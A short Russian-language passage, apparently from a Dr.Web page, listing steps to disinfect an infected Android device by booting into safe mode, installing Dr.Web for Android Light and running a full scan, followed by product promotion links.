    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке